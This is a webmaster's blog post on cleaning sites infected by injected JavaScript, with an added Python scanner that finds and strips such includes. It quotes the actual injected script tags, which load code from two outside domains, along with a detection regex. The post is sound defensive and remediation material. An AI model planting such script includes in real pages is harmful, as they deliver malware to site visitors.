This is something very common and normal; I get a call about this every couple of months:

“Hey Ed, the files in my server have been edited and now my website is loading some weird JavaScript from sites I do not know”
OR
“Hey Ed, Google blocked my site!!! and I am getting a Reported Attack Site page.”

Reported Attack Site!

This web site at website.com has been reported as an attack site and has been blocked based on your security preferences.

Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.

Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.


The problem:
Either you were hacked, or someone who logs into the account/server using FTP has a virus on his/her computer. You are lucky it's a simple JS include they did there; trust me, I have seen things you do not even imagine.

If you are luckier, only one website is infected; if not, the whole server is fucked up, all the accounts' files are edited, and in the worst-case scenario the code in the files is a mess.

Last time this happened, the problem was a virus on a designer's computer. He had no antivirus, and the 4 sites he had access to were the only ones infected; that happened the very same day he got the passwords for the FTP.

What we found:
All the files in the server/account that have "</head> <body>" tags were infected.

For example:
We opened the file ../index.html and checked the HTML code, and we noticed a problem right away. It does not say

</head><body>

instead it says
</head><script src=http://vanbeurden-porsche.be/library/index.php ></script><body>
OR
</head>
<script src=http://bigcjewelryandloan.com/library/index.php ></script><body>

Or something similar…

Solution:
The damage is done: get an antivirus and then change your FTP passwords.
Remove that JavaScript code from the head of your pages, replace the files if you have a backup, or contact me and I will do it.
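
One way to find and remove the include described above across a whole account, as an added example that is not part of the original post. It handles a single script element sitting between </head> and <body>; the own_hosts allowlist, the list of file extensions and the .infected backup suffix are assumptions.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# One <script src=...></script> element sitting between </head> and <body>,
# the position where the include described in this post was found.
INJECTED = re.compile(
    r"(</head\s*>)(\s*<script\b[^>]*\bsrc\s*=\s*[\"']?([^\s\"'>]+)[^>]*>"
    r"\s*</script\s*>\s*)(<body\b)",
    re.IGNORECASE,
)
EXTENSIONS = {".html", ".htm", ".php"}  # assumption: page types served by the site

def _is_external(match, own_hosts):
    """True when the script's src host is not in own_hosts (lowercase names)."""
    host = (urlparse(match.group(3)).hostname or "").lower()
    return bool(host) and host not in own_hosts

def find_injections(html, own_hosts):
    """Return the external script URLs found between </head> and <body>."""
    return [m.group(3) for m in INJECTED.finditer(html) if _is_external(m, own_hosts)]

def clean(html, own_hosts):
    """Drop the injected element and keep the surrounding </head> and <body>."""
    return INJECTED.sub(
        lambda m: m.group(1) + m.group(4) if _is_external(m, own_hosts) else m.group(0),
        html,
    )

def scan_tree(root, own_hosts, fix=False):
    """Report infected files under root; with fix=True also rewrite them."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in EXTENSIONS:
            continue
        # latin-1 maps every byte to one character, so the rewrite is byte-exact
        text = path.read_bytes().decode("latin-1")
        urls = find_injections(text, own_hosts)
        if urls:
            report[str(path)] = urls
            if fix:
                # keep the infected original beside the cleaned file for later review
                path.with_name(path.name + ".infected").write_bytes(text.encode("latin-1"))
                path.write_bytes(clean(text, own_hosts).encode("latin-1"))
    return report

if __name__ == "__main__":
    sample = "</head><script src=http://injected.example/x.php ></script><body>"  # constructed
    print(find_injections(sample, {"www.yoursite.example"}), clean(sample, set()))
```

Run it with fix=False first to review the report, and move the .infected copies out of the web root once you have looked at them.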


After the files are looking good, you will probably want to run a scan using Google to make sure your site is clean. Once you finish removing the code, use this link:
http://www.google.com/safebrowsing/diagnostic?site=http://www.YOURsite.com/&hl=en
Look at mine:
http://www.google.com/safebrowsing/diagnostic?site=http://www.eduardobaret.com/&hl=en
After that you might want to ask Google to verify that your site is OK. You will need to use Google's Webmaster Tools, and if your site is not OK you will get something like this.


From Google reports:


Status of the last badware appeal for this site: A review for this site has finished. The site was found to still be dangerous for users. Please review your site again. When you are confident that you have cleaned and secured your site, please request another review.

Google users will see a warning page when they attempt to visit pages within this site. You can visit the Google Safe Browsing diagnostic page for your site for detailed information about the problems we found. Sample pages that may be distributing malware:…………………



If you are having a similar problem and need some help let me know.
